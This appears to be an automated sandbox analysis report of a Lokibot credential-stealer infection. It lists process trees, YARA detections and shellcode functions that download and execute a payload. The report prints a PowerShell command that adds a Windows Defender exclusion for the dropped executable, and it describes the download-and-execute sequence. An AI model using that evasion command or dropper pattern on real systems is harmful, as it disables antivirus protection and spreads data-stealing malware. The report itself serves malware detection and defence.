Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"
Imagebase:	0xda0000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:11:27
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\wininit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wininit.exe"
Imagebase:	0xa40000
File size:	600'576 bytes
MD5 hash:	66B03D1AFF27D81E62B53FC108806211
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:11:29
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
Imagebase:	0x3e0000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:11:29
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\wininit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wininit.exe"
Imagebase:	0xa40000
File size:	600'576 bytes
MD5 hash:	66B03D1AFF27D81E62B53FC108806211
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000012.00000002.654667913.0000000000534000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	04:11:36
Start date:	20/11/2024
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:	0xffe00000
File size:	11'776 bytes
MD5 hash:	3796AE13F680D9239210513EDA590E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:11:36
Start date:	20/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Imagebase:	0x13f130000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:11:37
Start date:	20/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Imagebase:	0x13f130000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	16%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	45%
Total number of Nodes:	111
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 035F0499 Relevance: 6.1, APIs: 4, Instructions: 124
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(035F048B), ref: 035F0499

Part of subcall function 035F04B3: URLDownloadToFileW.URLMON(00000000,035F04C4,?,00000000,00000000), ref: 035F0570
Part of subcall function 035F04B3: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F05AE

ExitProcess.KERNEL32(00000000), ref: 035F05C6

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 33e07834c61a3b4a4d1bff4faa627a9e062eb90e656a724115017dc80b3cc87b
Instruction ID: 986ce9dd5f046fa3869211bbbafd224ef9cfc62d48b769d224bacc4b8e91a449
Opcode Fuzzy Hash: 33e07834c61a3b4a4d1bff4faa627a9e062eb90e656a724115017dc80b3cc87b
Instruction Fuzzy Hash: 2D4153D294C7D22FDB26D774AC2D664BF653A63100F5D8ACE92C60B8F3E3988100C352

Function 035F04B3 Relevance: 4.6, APIs: 3, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: d5a93389f758dc0731de51870d7bc158146041aee29c1b6709a8f8bd08986ff1
Instruction ID: 173ecc37bbf85e3cbe1f5804eea09a7a1914054188cca7737176f8ef6efab0f3
Opcode Fuzzy Hash: d5a93389f758dc0731de51870d7bc158146041aee29c1b6709a8f8bd08986ff1
Instruction Fuzzy Hash: 8E3112D694D3D22FDB26D774AC6D665FF653E62100F5D8ACE92C60B8E3E3988100C752

Function 035F056E Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035F04C4,?,00000000,00000000), ref: 035F0570

Part of subcall function 035F0587: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F05AE
Part of subcall function 035F0587: ExitProcess.KERNEL32(00000000), ref: 035F05C6

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: 8b939d0375e725dbb1412c815649462ba05812a3e7a7dec3cf418e1277df496e
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: B6F0BE91A8D3456DEA22F774AC9AF7A6E68BFC1700F5C0889B3424F0F3D5C48800866A

Function 035F059C Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F05AE

Part of subcall function 035F05C1: ExitProcess.KERNEL32(00000000), ref: 035F05C6

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 5182c780d5ad4986bb8a5c8b95eaa0625f3e79559d4425550e1e0ceb80026f84
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 83014995A843426DDF30F668B8157B6AB55FBC1710FCC8856AB810B0F7C4C480C3CAEA

Function 035F0587 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 2fb030f9e1292cbe27828f13aa1669e61ce6809cd2f5d80c52a86ad0133191f7
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 38012B605883056CEE21F2646C44BBAAB95FBC1714F9C8456E7510B0F3C1C48483869D

Function 035F05C1 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 035F05C6

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Function 035F05C8 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: b36bb4af0dab5832440af1ba466969e4fb03fdfe2e152aba376bd8e5e65bcdcb
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 20D05E712025028FC304DB04D940E23F37AFFD8211B18C264D6004B66AE770E892CA90

Non-executed Functions

Function 035F039A Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(035F0388), ref: 035F039A

Memory Dump Source

Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 23081c2f9d4407df301a849fb874a1b2adb20e461331d0472d76cb10e1f8a8a8
Instruction ID: 991dbf4e90e48ee306fd43c1f585de7465f5b6f62a493c6663034dca6e9f0011
Opcode Fuzzy Hash: 23081c2f9d4407df301a849fb874a1b2adb20e461331d0472d76cb10e1f8a8a8
Instruction Fuzzy Hash: 213185AA94EFC11FC316D7746A6E024FF61385300430CCACF869A0B5F3E3649106D356

Analysis Process: powershell.exePID: 3876, Parent PID: 3820COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	47
Total number of Limit Nodes:	7

Executed Functions

Function 003D1770 Relevance: 2.9, Strings: 2, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@#c, xrefs: 003D1864
@#c, xrefs: 003D185A

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$@#c
API String ID: 0-2251068165
Opcode ID: b37395b89a2f0ad9f5b93aca9e0138214a07d13e7a2ee04558e05bacf0c79e11
Instruction ID: df8fc7de06755c3b8f81bdfa5ce86c56af9ca2283bde13c9227838b772d8ca99
Opcode Fuzzy Hash: b37395b89a2f0ad9f5b93aca9e0138214a07d13e7a2ee04558e05bacf0c79e11
Instruction Fuzzy Hash: A1F12436B00204AFDB259F68E450B6EBBA2EFC5710F25806BF815AB391DB71DD41CB91

Function 003D1754 Relevance: 2.7, Strings: 2, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 003D1765
@#c, xrefs: 003D185A

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$b
API String ID: 0-816974587
Opcode ID: 76327b95f82a82df403f46c03663632836fe498bdbea4c1f816e69b500665394
Instruction ID: 17d024f9d5cbfbddd74622083e4ebd9ada60c3a05a1cecbb8f5333c3b5072d36
Opcode Fuzzy Hash: 76327b95f82a82df403f46c03663632836fe498bdbea4c1f816e69b500665394
Instruction Fuzzy Hash: CA91C236B00205AFCB15DF58E450B6EB7A2BF84710F26816BF815AB351DB72ED41CB91

Function 00264548 Relevance: 1.9, APIs: 1, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.415240405.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af854ba228094e45fc73acaf1118c92141370dba6d56c509c300989f06d18fa5
Instruction ID: d2d73e0aa2efc37a709dd3d4ab8b508f1625568d6fd1f0ac30f88fc190f8c698
Opcode Fuzzy Hash: af854ba228094e45fc73acaf1118c92141370dba6d56c509c300989f06d18fa5
Instruction Fuzzy Hash: CEE12574A11219AFDB04DF98D880A9EFBF2FF89314F248559E844AB361C771ED91CB90

Function 00264930 Relevance: 1.6, APIs: 1, Instructions: 65
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 002649C9

Memory Dump Source

Source File: 0000000A.00000002.415240405.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_260000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 9e9c259d8e383678469e5df211fdccd37da91643b9ecb452c904141366632b57
Instruction ID: 8a24076c59db6e972a4d98fda56d1b056c3994b81c9a6ff03587620499f01f15
Opcode Fuzzy Hash: 9e9c259d8e383678469e5df211fdccd37da91643b9ecb452c904141366632b57
Instruction Fuzzy Hash: C421F6B1D1161ADFCB00DF9AD884ADEFBB5FF48314F10851AE818A7350D374AA54CBA1

Function 003D0998 Relevance: .2, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c170206604f1fb404dcefa52999214f21c0abd949cca37f981b9ea223d95cab
Instruction ID: eefb3ff91ec9a02b3d545b5c94a77eb5aa3d0ea81d41f4ee5b76776983253ddc
Opcode Fuzzy Hash: 2c170206604f1fb404dcefa52999214f21c0abd949cca37f981b9ea223d95cab
Instruction Fuzzy Hash: DD514532B043149FE7255B649850B6EBBA2EFC5B10F25C06FE9899F382CA71CD01C7A1

Function 001DD01D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.415187490.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 553bca000bc8e59867e746ff018fb40b612f60d5efb105958fab1b8e55d76aa7
Instruction ID: 43d4006d23e85065d6dd2931a851b1f89a9202e79991655ce64581c28f9a8b0d
Opcode Fuzzy Hash: 553bca000bc8e59867e746ff018fb40b612f60d5efb105958fab1b8e55d76aa7
Instruction Fuzzy Hash: 1E01DB31104340AAEB209A25E8C4B67BB98EBC1324F28C41AFC480A382D3799D45CAB1

Function 001DD006 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.415187490.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d0f47874d0e65cce556f3ca4d57e7382869644cf52772dbf4bd179562fb013
Instruction ID: 0d98ab126be4fb7f307892ae4affca63d7d4c8492d107c52a87529702cf52f9f
Opcode Fuzzy Hash: e2d0f47874d0e65cce556f3ca4d57e7382869644cf52772dbf4bd179562fb013
Instruction Fuzzy Hash: E501716150D3C09FD7128B259C94B52BFB4DF53224F1981DBE8888F2A3D2699C48C772

Non-executed Functions

Function 003D00A0 Relevance: 16.7, Strings: 13, Instructions: 411COMMON

Download Yara Rule

Strings

L4#p, xrefs: 003D0419
L4#p, xrefs: 003D01C9
L4#p, xrefs: 003D01BE
L4#p, xrefs: 003D0160
@#c, xrefs: 003D00E2
`86, xrefs: 003D0240
@#c, xrefs: 003D00D8
@#c, xrefs: 003D0332
`86, xrefs: 003D011B
@#c, xrefs: 003D0328
L4#p, xrefs: 003D040E
`86, xrefs: 003D0189
L4#p, xrefs: 003D03B0

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$@#c$@#c$@#c$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`86$`86$`86
API String ID: 0-1267364048
Opcode ID: cddc24846fbd0b71c4465f5cc3468f1b2723edb90371d66a909a198476a26ff0
Instruction ID: 9b09c4e8b0d9f904ff040939bd8816de1bfbc61d7c9dbe6ae250c9373a7fb22a
Opcode Fuzzy Hash: cddc24846fbd0b71c4465f5cc3468f1b2723edb90371d66a909a198476a26ff0
Instruction Fuzzy Hash: 1DD13A36B00209DFDF1A9E64E410BBE77A6AFC1B10F25842BE9159B391CB71DD41CBA1

Function 003D0000 Relevance: 8.9, Strings: 7, Instructions: 148COMMON

Download Yara Rule

Strings

L4#p, xrefs: 003D01C9
@#c, xrefs: 003D00D8
`86, xrefs: 003D011B
`86, xrefs: 003D0189
L4#p, xrefs: 003D01BE
<86, xrefs: 003D004F
L4#p, xrefs: 003D0160

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: <86$@#c$L4#p$L4#p$L4#p$`86$`86
API String ID: 0-464623172
Opcode ID: 58b47c47cfac17ea60de1fa80bb61aa1fd2341498521422e0eb54a0c9c7327ef
Instruction ID: 7ea49961ce090ec31e5021a3850b988853b4af239eccfaa4d3a3b186861cf5c0
Opcode Fuzzy Hash: 58b47c47cfac17ea60de1fa80bb61aa1fd2341498521422e0eb54a0c9c7327ef
Instruction Fuzzy Hash: E051E776A08388DFDB1B8B10D8147697B71AF82B10F1A81A7E8459B3E3C7749D44CB62

Function 003D0F28 Relevance: 6.5, Strings: 5, Instructions: 258COMMON

Download Yara Rule

Strings

@#c, xrefs: 003D10F2
@#c, xrefs: 003D0FA9
@#c, xrefs: 003D0F9F
@#c, xrefs: 003D10E8
|:6, xrefs: 003D1262

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$@#c$@#c$@#c$|:6
API String ID: 0-1917465421
Opcode ID: 4fc5204ae82992698f1bcc6ed73bb1309c9597b07287e6a02729107b39655775
Instruction ID: 770a4b15d483f41f07c6ddb4dfd8469766bec8723e1b6bed6d350c80835e39c3
Opcode Fuzzy Hash: 4fc5204ae82992698f1bcc6ed73bb1309c9597b07287e6a02729107b39655775
Instruction Fuzzy Hash: B4918732B04244AFDB26AF34E4506AABBF2AFD5310F2580ABD555CB351DB31CD85CB92

Function 003D05C8 Relevance: 6.5, Strings: 5, Instructions: 206COMMON

Download Yara Rule

Strings

L4#p, xrefs: 003D06F1
@#c, xrefs: 003D060A
@#c, xrefs: 003D0600
L4#p, xrefs: 003D0688
L4#p, xrefs: 003D06E6

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$@#c$L4#p$L4#p$L4#p
API String ID: 0-1189058554
Opcode ID: 1d82218f4bfd553e54debadd041feab8592a867d4d55aff1271278321153567a
Instruction ID: 29456d190390cff8db3d7442ba38d7c5e3aedf570122d37153aca1b0af76c1ce
Opcode Fuzzy Hash: 1d82218f4bfd553e54debadd041feab8592a867d4d55aff1271278321153567a
Instruction Fuzzy Hash: 21614B36B002189FDF1A9E64E4007BE77A6EFC0B10F25802AE9559F391DB71ED51CBA1

Function 003D1588 Relevance: 6.4, Strings: 5, Instructions: 178COMMON

Download Yara Rule

Strings

0;6, xrefs: 003D15BA
xFc, xrefs: 003D1728
h%3e, xrefs: 003D1668
xFc, xrefs: 003D171A
h%3e, xrefs: 003D1676

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 0;6$h%3e$h%3e$xFc$xFc
API String ID: 0-1289942254
Opcode ID: e7977555913dd05b46499a2af8aad97c35ee2f4d90d3acec262dd2a738818e8f
Instruction ID: b4a2b86b70d90bb24a555bd638307868cac1faf708592f06ca4d4b12cbf7cca2
Opcode Fuzzy Hash: e7977555913dd05b46499a2af8aad97c35ee2f4d90d3acec262dd2a738818e8f
Instruction Fuzzy Hash: 7B516637704204AFEB224A69B45067AF7A6AFD2321B39803FE85AC7351DB72CC01C721

Function 003D1E8A Relevance: 6.4, Strings: 5, Instructions: 166COMMON

Download Yara Rule

Strings

L4#p, xrefs: 003D1F30
L4#p, xrefs: 003D1F99
@#c, xrefs: 003D1EB2
L4#p, xrefs: 003D1F8E
@#c, xrefs: 003D1EA8

Memory Dump Source

Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$@#c$L4#p$L4#p$L4#p
API String ID: 0-1189058554
Opcode ID: 4eaffeeb16078223de2d5950e61b3450c96df793443b415f07b9c96789b89ced
Instruction ID: d3ca156ec7ba8fe47a5bf9dbc93e45834d9a8041f3a74dc968ef6d283c39eab5
Opcode Fuzzy Hash: 4eaffeeb16078223de2d5950e61b3450c96df793443b415f07b9c96789b89ced
Instruction Fuzzy Hash: 59513936B00209EFEF129F64E4007BE77AAAF81310F248167E9159B3A1CB75DD41C7A2

Function 003D05A8 Relevance: 5.1, Strings: 4, Instructions: 125COMMON

Download Yara Rule

Strings

L4#p, xrefs: 003D06F1
@#c, xrefs: 003D0600
L4#p, xrefs: 003D0688
L4#p, xrefs: 003D06E6

Memory Dump Source

